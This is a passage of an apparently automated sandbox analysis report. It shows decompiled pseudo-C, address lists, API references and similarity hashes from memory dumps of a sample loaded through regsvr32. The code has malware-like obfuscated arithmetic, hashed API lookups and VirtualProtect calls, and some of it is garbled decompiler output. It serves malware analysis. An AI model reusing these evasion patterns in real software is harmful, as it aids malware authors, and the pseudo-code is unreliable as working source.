				r8d = r8d ^ 0x00002598;
				r10d = r10d +  *__rdx;
				_t151 = _t158 - 0x0000145b ^ 0x00003a59;
				 *(_t201 + 0x50) = _t151;
				 *((long long*)(_t201 + 0xe0)) = __rsi;
				_t192 = __rsi ^ _t179;
				r11d = r9d;
				r11d = r11d -  *((intOrPtr*)(__rdx + 0x60));
				_t169 = __rsi + 0x170;
				r11d = r11d + 0x38e9;
				r9d = r15d;
				 *(_t201 + 0x48) = _t179;
				r9d = r9d & _t142;
				 *(_t201 + 0x40) = r8d;
				 *(_t201 + 0x38) = r10d;
				r8d = _t134 |  *(__rdx + 0x48);
				 *(_t201 + 0x30) = r11d;
				 *(_t201 + 0x28) = _t159;
				 *(_t201 + 0x20) = _t192;
				E00007FFC7FFC130E2A70(_t159, _t169, __rdx, __r8, _t207);
				r9d = _t215 - 0x3666;
				r9d = r9d ^ 0x000037e1;
				r10d =  *(__rdx + 0x150);
				r10d = r10d + 0x343a;
				r11d =  *(__rdx + 0x120);
				r11d = r11d ^ 0x00001f2c;
				 *(_t201 + 0xf0) = _t151;
				r13d = r13d - r12d;
				_t188 = _t186 + 0x00000d93 ^ 0x00002598;
				_t181 = __rdx & 0x0000228c;
				_t152 = _t151 & 0x0000228c;
				r8d = (_t196 ^ 0x000030d5) - 0x37e1;
				 *(_t201 + 0x48) = _t152;
				 *(_t201 + 0x40) = __rdx;
				 *(_t201 + 0x38) = r10d;
				 *(_t201 + 0x30) = r11d;
				 *(_t201 + 0x28) = _t159 ^ _t196;
				 *(_t201 + 0x20) = _t188;
				_t112 = E00007FFC7FFC130F98F0(r13d, _t152, _t181, _t203, _t205, _t210);
				_t133 =  *(__rdx + 0x120);
				r12d = _t112;
				r15d =  *(__rdx + 0xc8);
				r15d = r15d ^ _t133;
				r13d =  *(__rdx + 0x1b0);
				_t206 =  *((intOrPtr*)(_t201 + 0xd8));
				r14d =  *(__rdx + 0x150);
				r14d = r14d |  *(__rdx + 0x188);
				r8d =  *_t206;
				r8d = r8d + _t206[0x38];
				r11d = _t206[0x1e];
				r10d = _t206[0x8a];
				r10d = r10d - 0x3666;
				_t153 = _t152 ^  *(_t201 + 0x80);
				r8d = r8d | _t133;
				r13d = r13d | 0x000027b2;
				r13d = r13d - _t206[0x24];
				r11d = r11d |  *(_t201 + 0x80);
				r11d = r11d +  *(_t201 + 0xe8);
				 *(_t201 + 0x78) = r15d;
				 *(_t201 + 0x70) = r14d;
				 *((long long*)(_t201 + 0x68)) = _t169 + _t181;
				 *((long long*)(_t201 + 0x60)) = _t192 + 0x38e9;
				_t173 = ( *(_t201 + 0xd0) -  *(_t201 + 0xf0) + 0xea2) * _t188;
				 *(_t201 + 0xf0) = _t153;
				 *(_t201 + 0xd0) = _t173;
				r9d =  *(_t201 + 0x110);
				r12d =  *(_t201 + 0x100);
				r9d = r9d + 0xffffe749;
				r9d = r9d ^  *(__rdx + 0x130);
				r12d = r12d | 0x000038e9;
				r9d = r9d |  *( *((intOrPtr*)(_t201 + 0xd8)) + 0x100);
				 *((long long*)(_t201 + 0x58)) =  *(_t201 + 0xd0);
				 *(_t201 + 0x50) =  *(_t201 + 0x130) + _t173 ^ 0x0000343a;
				 *(_t201 + 0x48) = r11d;
				 *(_t201 + 0x40) = r10d;
				r10d =  *(_t201 + 0xf0);
				 *(_t201 + 0x38) = r10d;
				 *(_t201 + 0x30) = r13d;
				 *(_t201 + 0x28) = r8d;
				 *(_t201 + 0x20) = _t153 ^  *(_t201 + 0x130);
				return E00007FFC7FFC130FA750(_t153 ^  *(_t201 + 0x130), _t173 &  *(_t201 + 0xe8), _t173 &  *(_t201 + 0xe8),  *((intOrPtr*)(_t201 + 0xd8)), _t206);
			}



































                                0x7ffc130e6d50
                                0x7ffc130e6d50
                                0x7ffc130e6d55
                                0x7ffc130e6d5e
                                0x7ffc130e6d64
                                0x7ffc130e6d6b
                                0x7ffc130e6d72
                                0x7ffc130e6d78
                                0x7ffc130e6d82
                                0x7ffc130e6d89
                                0x7ffc130e6d8c
                                0x7ffc130e6d93
                                0x7ffc130e6d9a
                                0x7ffc130e6da1
                                0x7ffc130e6da8
                                0x7ffc130e6dbb
                                0x7ffc130e6dc2
                                0x7ffc130e6dc9
                                0x7ffc130e6dd0
                                0x7ffc130e6dd7
                                0x7ffc130e6ddf
                                0x7ffc130e6de9
                                0x7ffc130e6deb
                                0x7ffc130e6df4
                                0x7ffc130e6dfd
                                0x7ffc130e6e07
                                0x7ffc130e6e0d
                                0x7ffc130e6e14
                                0x7ffc130e6e1a
                                0x7ffc130e6e27
                                0x7ffc130e6e43
                                0x7ffc130e6e46
                                0x7ffc130e6e4c
                                0x7ffc130e6e53
                                0x7ffc130e6e56
                                0x7ffc130e6e64
                                0x7ffc130e6e6b
                                0x7ffc130e6e6e
                                0x7ffc130e6e77
                                0x7ffc130e6e7b
                                0x7ffc130e6e8c
                                0x7ffc130e6e98
                                0x7ffc130e6e9b
                                0x7ffc130e6e9f
                                0x7ffc130e6ea9
                                0x7ffc130e6eb3
                                0x7ffc130e6eb6
                                0x7ffc130e6eba
                                0x7ffc130e6ebd
                                0x7ffc130e6ec5
                                0x7ffc130e6eca
                                0x7ffc130e6ecd
                                0x7ffc130e6ed2
                                0x7ffc130e6ed6
                                0x7ffc130e6eda
                                0x7ffc130e6ee6
                                0x7ffc130e6ef4
                                0x7ffc130e6efb
                                0x7ffc130e6f07
                                0x7ffc130e6f0e
                                0x7ffc130e6f1f
                                0x7ffc130e6f33
                                0x7ffc130e6f3a
                                0x7ffc130e6f44
                                0x7ffc130e6f51
                                0x7ffc130e6f57
                                0x7ffc130e6f5c
                                0x7ffc130e6f63
                                0x7ffc130e6f6a
                                0x7ffc130e6f6f
                                0x7ffc130e6f74
                                0x7ffc130e6f79
                                0x7ffc130e6f7d
                                0x7ffc130e6f81
                                0x7ffc130e6f86
                                0x7ffc130e6f8d
                                0x7ffc130e6f97
                                0x7ffc130e6fa5
                                0x7ffc130e6fa8
                                0x7ffc130e6fb9
                                0x7ffc130e6fc1
                                0x7ffc130e6fc4
                                0x7ffc130e6fcb
                                0x7ffc130e6fce
                                0x7ffc130e6fdc
                                0x7ffc130e6fe6
                                0x7ffc130e6ff7
                                0x7ffc130e6ffe
                                0x7ffc130e7005
                                0x7ffc130e700f
                                0x7ffc130e7016
                                0x7ffc130e702d
                                0x7ffc130e7035
                                0x7ffc130e7044
                                0x7ffc130e7049
                                0x7ffc130e704e
                                0x7ffc130e7052
                                0x7ffc130e7056
                                0x7ffc130e7059
                                0x7ffc130e706e
                                0x7ffc130e708b
                                0x7ffc130e7096
                                0x7ffc130e709e
                                0x7ffc130e70a5
                                0x7ffc130e70a8
                                0x7ffc130e70af
                                0x7ffc130e70bd
                                0x7ffc130e70c1
                                0x7ffc130e70c5
                                0x7ffc130e70ca
                                0x7ffc130e70cf
                                0x7ffc130e70d7
                                0x7ffc130e70dc
                                0x7ffc130e70e1
                                0x7ffc130e70eb
                                0x7ffc130e711d

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                                • Instruction ID: 6a52ef302f8d0ada13a76ef666c9e59bc3bdeddbfdec42d790b2c44045eca038
                                • Opcode Fuzzy Hash: 701046bcfc664d896e7e8cbef1e18b682c6a552b8b4cc95593f1301737a4187d
                                • Instruction Fuzzy Hash: BE914AB36186D48BD325CF19E448B9EBBA4F788788F114129EF8957B58C738EA51CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EB3A0 Relevance: 18.1, APIs: 12, Instructions: 133COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 7ffc130eb3a0-7ffc130eb3a6 1 7ffc130eb3a8-7ffc130eb3ab 0->1 2 7ffc130eb3e1-7ffc130eb538 0->2 4 7ffc130eb3d5-7ffc130eb414 call 7ffc130eb89c 1->4 5 7ffc130eb3ad-7ffc130eb3b0 1->5 8 7ffc130eb53a-7ffc130eb53c 2->8 9 7ffc130eb53e-7ffc130eb559 call 7ffc130eb72c 2->9 22 7ffc130eb416-7ffc130eb418 4->22 23 7ffc130eb41d-7ffc130eb432 call 7ffc130eb72c 4->23 6 7ffc130eb3c8 __scrt_dllmain_crt_thread_attach 5->6 7 7ffc130eb3b2-7ffc130eb3b5 5->7 14 7ffc130eb3cd-7ffc130eb3d4 6->14 12 7ffc130eb3b7-7ffc130eb3c0 7->12 13 7ffc130eb3c1-7ffc130eb3c6 call 7ffc130eb7dc 7->13 15 7ffc130eb58e-7ffc130eb59d 8->15 20 7ffc130eb55b-7ffc130eb560 call 7ffc130ebc0c 9->20 21 7ffc130eb565-7ffc130eb58c call 7ffc130eb858 call 7ffc130eb888 call 7ffc130eba50 call 7ffc130eba74 9->21 13->14 20->21 21->15 27 7ffc130eb505-7ffc130eb51a 22->27 32 7ffc130eb434-7ffc130eb439 call 7ffc130ebc0c 23->32 33 7ffc130eb43e-7ffc130eb44f call 7ffc130eb79c 23->33 32->33 40 7ffc130eb4b8-7ffc130eb4c2 call 7ffc130eba50 33->40 41 7ffc130eb451-7ffc130eb48d call 7ffc130ebd54 call 7ffc130ebaf0 call 7ffc130ebbb4 call 7ffc130ebaf0 call 7ffc130ebbe0 call 7ffc130ed0c8 33->41 40->22 48 7ffc130eb4c8-7ffc130eb4d4 call 7ffc130ebbfc 40->48 41->40 68 7ffc130eb48f-7ffc130eb496 __scrt_dllmain_after_initialize_c 41->68 55 7ffc130eb4fa-7ffc130eb500 48->55 56 7ffc130eb4d6-7ffc130eb4e0 call 7ffc130eb9b4 48->56 55->27 56->55 62 7ffc130eb4e2-7ffc130eb4f5 call 7ffc130ebdec 56->62 62->55 68->40 69 7ffc130eb498-7ffc130eb4b5 call 7ffc130ed050 68->69 69->40
                                C-Code - Quality: 100%
                                			E00007FFC7FFC130EB3A0(void* __edx) {
				void* _t1;
				void* _t3;
				void* _t6;

				_t3 = _t6;
				if (_t3 == 0) goto 0x130eb3e1;
				if (_t3 == 0) goto 0x130eb3d5;
				if (_t3 == 0) goto 0x130eb3c8;
				if (_t6 == 1) goto 0x130eb3c1;
				return _t1;
			}






                                0x7ffc130eb3a4
                                0x7ffc130eb3a6
                                0x7ffc130eb3ab
                                0x7ffc130eb3b0
                                0x7ffc130eb3b5
                                0x7ffc130eb3c0

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                • String ID:
                                • API String ID: 3885183344-0
                                • Opcode ID: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction ID: 16b6b08da8b7b05c29702a84e49a71bc7655186e0b7c35f39b35c38ddf256081
                                • Opcode Fuzzy Hash: 4b4e070a4b30cda99fb3dc24f2d45a93fe48c4a995dadef060bf1a20821bd7b8
                                • Instruction Fuzzy Hash: 39519E21F0CE6F85FA24AB66A4422B926E0AF543ACF644031E54D377E7DE2CE465C734
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E2380 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 434memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130E2380(void* __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
				void* __rsi;
				void* _t104;
				signed int _t105;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				void* _t113;
				void* _t114;
				void* _t115;
				signed int _t121;
				void* _t124;
				signed long long _t186;
				signed long long _t188;
				signed int _t194;
				long long _t205;
				void* _t209;
				void* _t210;
				void* _t220;
				void* _t224;
				void* _t226;
				void* _t228;

				spl = spl + _t114;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t220 = _t209;
				 *((long long*)(_t220 + 0x18)) = __rbx;
				 *((long long*)(_t220 + 0x20)) = _t205;
				_t210 = _t209 - 0x60;
				_t115 = __r9 - 0x2103;
				r13d = __r9 + 0x6ab;
				_t194 =  *(_t210 + 0xb8) + 0xfffffc37;
				 *(_t210 + 0xb8) =  *((intOrPtr*)(_t210 + 0xc8)) + 0x152;
				 *(_t210 + 0x98) = _t194;
				r14d = 0x1f0b6e910fc62a6;
				r15d = __rdx + 0x1249;
				r14d =  <  ? _t115 : r14d;
				if (r15d - _t104 > 0) goto 0x130e2709;
				_t105 = _t228 + 0x108;
				 *((long long*)(_t220 + 8)) = __r12;
				_t124 = r14d - _t105;
				if (_t124 > 0) goto 0x130e25c8;
				spl = spl ^  *0x3595;
				 *0x3595 =  *0x3595 + _t105;
				r12d = 0x3189;
				 *(_t210 + 0x20) = _t105;
				r8d = r12d;
				r9d = 0x1f2c;
				__r8[0x2e0923] = __r8[0x2e0923] + _t115;
				 *0x3595 =  *0x3595 + _t105;
				r11d = _t194 + 0x19d;
				 *((long long*)(_t210 + 0x50)) = __r8;
				r10d = _t226 - 0x1033;
				__r8[0x22] = 0x3595;
				 *(_t210 + 0x48) = 0x3595;
				 *(_t210 + 0x40) = r10d;
				r8d = 0x7669e800003534;
				 *(_t210 + 0x38) = r11d;
				r9d = _t226 - 0x16de;
				 *(_t210 + 0x30) = __rdx - 0x2598 + 0x36e7;
				 *((long long*)(_t210 + 0x28)) = __rdx + 0xfffffffffffffa9a;
				 *(_t210 + 0x20) = 0x7669e800002692;
				_t107 = E00007FFC7FFC130FF160(0x3595, __r8, __r8, _t228, _t226, _t224);
				r8d = 0;
				if (_t124 == 0) goto 0x130e2589;
				r9d = r8d;
				asm("o16 nop [eax+eax]");
				 *(__r9 + __r8[0x22]) = _t224 + 0x00000c8c ^  *(__r8[0x14] + __r9);
				_t108 = _t107 / __r8[0xe];
				__r8[0x90] = 0;
				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
				if (__r8[0x78] !=  *((intOrPtr*)(__r8[0xc] + 0x1d0)) - 0x4cb) goto 0x130e2568;
				__r8[0x32] = __r8[0x32] + 0xffffdfce;
				r8d = r8d + 1;
				_t186 =  *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8ace;
				if (r8d - _t186 < 0) goto 0x130e24f0;
				__r8[0x66] = __r8[0x66] | 0x0a01b449;
				if (_t108 - r12d >= 0) goto 0x130e25b8;
				r12d = r12d - _t108;
				__r8[0x66] = __r8[0x66] + (__r8[0x4c] ^ 0x0000127e) * 0x44f9;
				__r8[0x56] = __r8[0x14];
				goto 0x130e2701;
				_t110 = r12d + r14d;
				if (r14d - _t110 >= 0) goto 0x130e2624;
				_t188 = _t186 & 0x000027b2 | __r8[0x2a];
				if (__r8[0x2e] - _t188 > 0) goto 0x130e2624;
				if (_t228 - 0x102f - _t188 <= 0) goto 0x130e2610;
				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
				if (__r8[0x7e] - (_t121 | r13d) < 0) goto 0x130e26ed;
				r10d = _t121;
				r11d = __r8[0x78];
				r15d = r15d - (_t110 ^ r15d);
				r11d = r11d - __r8[0x74];
				r11d = r11d + __r8[0x24];
				r14d = r14d *  *__r8;
				r15d = r15d + 0xea7;
				r10d = r10d - __r8[0x12];
				r15d = r15d ^ 0x00002598;
				r8d = __r8[4];
				r9d = _t121;
				r8d = r8d &  *(_t210 + 0xb8);
				r12d = 0x3189;
				 *(_t210 + 0x58) = __r8[0x54] & 0x0000228c;
				r9d = r9d | r12d;
				 *((long long*)(_t210 + 0x50)) = 0x2602;
				 *(_t210 + 0x48) = r11d;
				 *(_t210 + 0x40) = __r8;
				 *(_t210 + 0x38) = r10d;
				 *(_t210 + 0x30) = r15d;
				 *((long long*)(_t210 + 0x28)) = __r8[6];
				 *(_t210 + 0x20) = r14d;
				_t113 = E00007FFC7FFC130E2060(__r8,  *(_t210 + 0xb8) * 0x30d5, (__r8[0x3c] ^ 0x000023f6) *  *(_t210 + 0x98), __r8[0x54] & 0x0000228c, 0x7669e800002692, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t121;
				return _t113;
			}
























                                0x7ffc130e2389
                                0x7ffc130e238b
                                0x7ffc130e238c
                                0x7ffc130e238d
                                0x7ffc130e238e
                                0x7ffc130e238f
                                0x7ffc130e2390
                                0x7ffc130e2393
                                0x7ffc130e2397
                                0x7ffc130e23a3
                                0x7ffc130e23ae
                                0x7ffc130e23bc
                                0x7ffc130e23ce
                                0x7ffc130e23d4
                                0x7ffc130e23e1
                                0x7ffc130e23eb
                                0x7ffc130e23f2
                                0x7ffc130e2402
                                0x7ffc130e240f
                                0x7ffc130e2415
                                0x7ffc130e241c
                                0x7ffc130e2420
                                0x7ffc130e2423
                                0x7ffc130e2432
                                0x7ffc130e2434
                                0x7ffc130e2436
                                0x7ffc130e243c
                                0x7ffc130e2441
                                0x7ffc130e2444
                                0x7ffc130e2456
                                0x7ffc130e245c
                                0x7ffc130e245e
                                0x7ffc130e2465
                                0x7ffc130e246a
                                0x7ffc130e2471
                                0x7ffc130e248b
                                0x7ffc130e2495
                                0x7ffc130e249a
                                0x7ffc130e24a1
                                0x7ffc130e24a6
                                0x7ffc130e24ad
                                0x7ffc130e24b8
                                0x7ffc130e24c3
                                0x7ffc130e24c7
                                0x7ffc130e24cf
                                0x7ffc130e24de
                                0x7ffc130e24e4
                                0x7ffc130e24e7
                                0x7ffc130e250e
                                0x7ffc130e2531
                                0x7ffc130e2534
                                0x7ffc130e253e
                                0x7ffc130e255b
                                0x7ffc130e255d
                                0x7ffc130e256b
                                0x7ffc130e2577
                                0x7ffc130e2583
                                0x7ffc130e258f
                                0x7ffc130e25a2
                                0x7ffc130e25a4
                                0x7ffc130e25b1
                                0x7ffc130e25bc
                                0x7ffc130e25c3
                                0x7ffc130e25ce
                                0x7ffc130e25d4
                                0x7ffc130e25ea
                                0x7ffc130e25f4
                                0x7ffc130e261b
                                0x7ffc130e261d
                                0x7ffc130e2634
                                0x7ffc130e263d
                                0x7ffc130e2649
                                0x7ffc130e2650
                                0x7ffc130e2653
                                0x7ffc130e266d
                                0x7ffc130e267a
                                0x7ffc130e267e
                                0x7ffc130e2685
                                0x7ffc130e2689
                                0x7ffc130e2690
                                0x7ffc130e2694
                                0x7ffc130e26b2
                                0x7ffc130e26ba
                                0x7ffc130e26c0
                                0x7ffc130e26c4
                                0x7ffc130e26c7
                                0x7ffc130e26cb
                                0x7ffc130e26d0
                                0x7ffc130e26d5
                                0x7ffc130e26da
                                0x7ffc130e26df
                                0x7ffc130e26e3
                                0x7ffc130e26e8
                                0x7ffc130e26fa
                                0x7ffc130e272d

                                APIs
                                • GetProcessHeap.KERNEL32 ref: 00007FFC13101456
                                • HeapAlloc.KERNEL32 ref: 00007FFC13101467
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7CFC
                                  • Part of subcall function 00007FFC130F7C20: VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FFC130EA050), ref: 00007FFC130F7E18
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: HeapProtectVirtual$AllocProcess
                                • String ID: 2 $6$62 $662 $7$8662
                                • API String ID: 3541638468-3329516171
                                • Opcode ID: 67c9b6950c3a2d71ef505d544f281c5ab4f6862895f610e6b6873dadac7de400
                                • Instruction ID: 799a62481cb79f975a68f88121b026e27988392592366ed8ebdcb442330c63ba
                                • Opcode Fuzzy Hash: 67c9b6950c3a2d71ef505d544f281c5ab4f6862895f610e6b6873dadac7de400
                                • Instruction Fuzzy Hash: 5232F2735182C18BE371CF29E44479EBBA4F788748F148129EA899BB59DB7CE954CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00731BFC Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 216memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 321 731bfc-731c41 322 731c43-731c45 call 7347b8 321->322 323 731c4a-731c5b call 73908c 321->323 322->323 327 731c63-731c6d 323->327 328 731c5d 323->328 329 731c6f-731c80 327->329 330 731cdd-731ce4 327->330 328->327 331 731c82-731c85 329->331 332 731c94 329->332 333 731ceb-731cfc call 73908c 330->333 335 731c90-731c92 331->335 336 731c87-731c8e 331->336 337 731c97-731c9a 332->337 341 731d09-731d0c 333->341 342 731cfe-731d03 333->342 335->332 335->337 336->331 336->335 339 731caf-731cc1 call 73240c 337->339 340 731c9c-731ca0 337->340 339->330 351 731cc3-731cdb 339->351 340->339 343 731ca2-731ca6 340->343 345 731d12-731d49 call 735168 341->345 346 731ed1 341->346 342->341 343->339 347 731ca8-731cac 343->347 353 731ec1-731ecf HeapFree 345->353 354 731d4f-731d6f call 73908c 345->354 349 731ed6-731eef 346->349 347->339 351->333 353->349 357 731d71 354->357 358 731d77-731d7e 354->358 357->358 359 731d80-731d8a call 73240c 358->359 360 731d8c 358->360 361 731d94-731da5 call 73908c 359->361 360->361 366 731da7 361->366 367 731dad-731db0 361->367 366->367 368 731ea1-731ebb HeapFree * 2 367->368 369 731db6-731dc9 call 73908c 367->369 368->353 372 731dd5 369->372 373 731dcb-731dd3 369->373 374 731dd8-731deb call 73908c 372->374 373->374 378 731df7 374->378 379 731ded-731df5 374->379 380 731dfa-731e0d call 73240c 378->380 379->380 384 731e93-731e9b HeapFree 380->384 385 731e13-731e70 call 7347b0 call 736518 380->385 384->368 389 731e75-731e7c 385->389 390 731e85-731e8d HeapFree 389->390 391 731e7e-731e83 389->391 390->384 391->390
                                C-Code - Quality: 28%
                                			E00731BFC(void* __ecx, long long* __rax, long long* __rbx, intOrPtr* __rcx, long long __rdx, void* __r8, void* __r9, void* __r11, long long* _a8, long long _a16, long long _a24, long long _a40, long long _a48) {
				long long _v72;
				char _v80;
				char _v88;
				long long _v96;
				char _v104;
				signed int _v112;
				long long _v120;
				long long _v128;
				signed int _v136;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t63;
				signed int _t67;
				signed int _t78;
				long long _t94;
				signed int _t111;
				signed int _t112;
				long long* _t148;
				long long* _t151;
				intOrPtr* _t154;
				long long* _t155;
				signed long long _t160;
				intOrPtr _t185;
				intOrPtr* _t188;
				long long _t189;
				long long* _t190;
				long long* _t191;
				long long _t192;
				long long* _t194;
				void* _t198;
				void* _t205;
				void* _t207;
				long long* _t208;
				intOrPtr _t209;
				long long _t210;

				_t207 = __r11;
				_t205 = __r9;
				_t198 = __r8;
				_t155 = __rbx;
				_t148 = __rax;
				_a24 = __rbx;
				_a16 = __rdx;
				_t210 =  *0x73d458;
				_t189 =  *((intOrPtr*)(__rcx));
				r13d = r8d;
				_t192 = __rdx;
				_t190 = __rcx;
				_v72 = _t210;
				_v96 = _t189;
				_t208 = __rbx;
				if( *((intOrPtr*)(__rcx + 0x70)) >=  *((intOrPtr*)(__rcx + 0x50))) {
					E007347B8(0, __ecx, __rax, __rbx, __rcx, __rdx);
				}
				_t160 =  *((intOrPtr*)(_t210 + 0x10));
				E0073908C(0x4a75e5e7, _t148, _t160);
				if(_t148 != _t155) {
					_t9 = _t189 + 0x18; // 0x18
					_t160 = _t9;
					 *_t148();
				}
				_t93 =  *(_t190 + 0x70) & 0x000000ff;
				_t63 =  *(_t190 + 0x50) & 0x000000ff;
				if(( *(_t190 + 0x70) & 0x000000ff) < _t63) {
					_t112 = 0;
					_t188 =  *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x48)) + _t160 * 8));
					_t154 = _t188;
					_t94 =  *_t188;
					if(_t94 == 0) {
						L9:
						_t148 = _t155;
					} else {
						while(_t94 != 0x2f) {
							_t148 = _t154 + 1;
							_t94 =  *_t148;
							if(_t94 != 0) {
								continue;
							}
							break;
						}
						if(_t94 == 0) {
							goto L9;
						}
					}
					if(_t148 != _t155 &&  *((char*)(_t148 - 1)) == 0x3a &&  *((char*)(_t148 + 1)) == 0x2f) {
						_t112 = _t63 - 0x4a75e5e7 + 2;
					}
					_t93 = _t112;
					E0073240C(0, 0, _t155, _t160 + _t188, _t189, _t190);
					_t208 = _t148;
					if(_t148 == _t155) {
						goto L16;
					} else {
						bpl = _t112 == 8;
						_a8 = 0;
						_t192 = _a16;
					}
				}
				E0073908C(0x8d72aad2, _t148,  *((intOrPtr*)(_t210 + 0x10)));
				if(_t148 != _t155) {
					 *_t148();
				}
				if(_t208 == _t155) {
					_t111 = 8;
				} else {
					_t23 =  &_v104; // 0x2
					r9d = 0;
					r8d = r13d;
					_v112 = _t23;
					_t25 =  &_v88; // 0x12
					_t185 = _t192;
					_v120 = _t25;
					_t27 =  &_v80; // 0x1a
					_t151 = _t27;
					_v128 = _t151;
					_v136 = 0;
					_t67 = E00735168(_t93, 0, _t155, _t190, _t185, _t198, _t205, _t207); // executed
					_t111 = _t67;
					if(_t67 == 0) {
						_t209 =  *0x73d458;
						_t111 = 8;
						E0073908C(0x4a75e5e7, _t151,  *((intOrPtr*)(_t209 + 0x10)));
						if(_t151 != _t155) {
							 *_t151();
						}
						_t165 =  *((intOrPtr*)(_t190 + 0x18));
						if( *((intOrPtr*)(_t190 + 0x18)) == _t155) {
							_t191 = _a8;
						} else {
							E0073240C(0, 0, _t155, _t165, _t189, _t190);
							_t191 = _t151;
						}
						E0073908C(0x8d72aad2, _t151,  *((intOrPtr*)(_t209 + 0x10)));
						if(_t151 != _t155) {
							 *_t151();
						}
						if(_t191 != _t155) {
							E0073908C(0xfb849f8f, _t151,  *((intOrPtr*)(_t210 + 0x18)));
							if(_t151 == _t155) {
								r14d = 0;
							} else {
								r14d =  *_t151();
							}
							E0073908C(0xfb849f8f, _t151,  *((intOrPtr*)(_v72 + 0x18)));
							if(_t151 == _t155) {
								r13d = 0;
							} else {
								r13d =  *_t151();
							}
							_t40 = _t210 + 2; // 0x2
							E0073240C(0, _t209 + _t40, _t155, _t208, _t189, _t191);
							_t194 = _t151;
							if(_t151 != _t155) {
								_t41 = _t209 + 1; // 0x1
								r8d = _t41;
								 *((char*)(_t185 + _t151)) = 0x2f;
								L007347B0();
								_v112 = _a8 != 0x00000000 | 0x00000002;
								_v120 = _a48;
								_v128 = _a40;
								_v136 = _v104;
								_t78 = E00736518(_a8 != 0x00000000 | 0x00000002, _t111, 0xfb849f8f, _a40, _v96, _t194, _t189, _t191, _t194, _v80, _v88); // executed
								_t111 = _t78;
								if(_t78 == 0x10d2) {
									asm("sbb eax, eax");
									_t111 = _t111 & _t78;
								}
								HeapFree();
							}
							HeapFree();
						}
						HeapFree();
						HeapFree(??, ??, ??);
					}
					HeapFree();
				}
				return _t111;
			}







































                                0x00731bfc
                                0x00731bfc
                                0x00731bfc
                                0x00731bfc
                                0x00731bfc
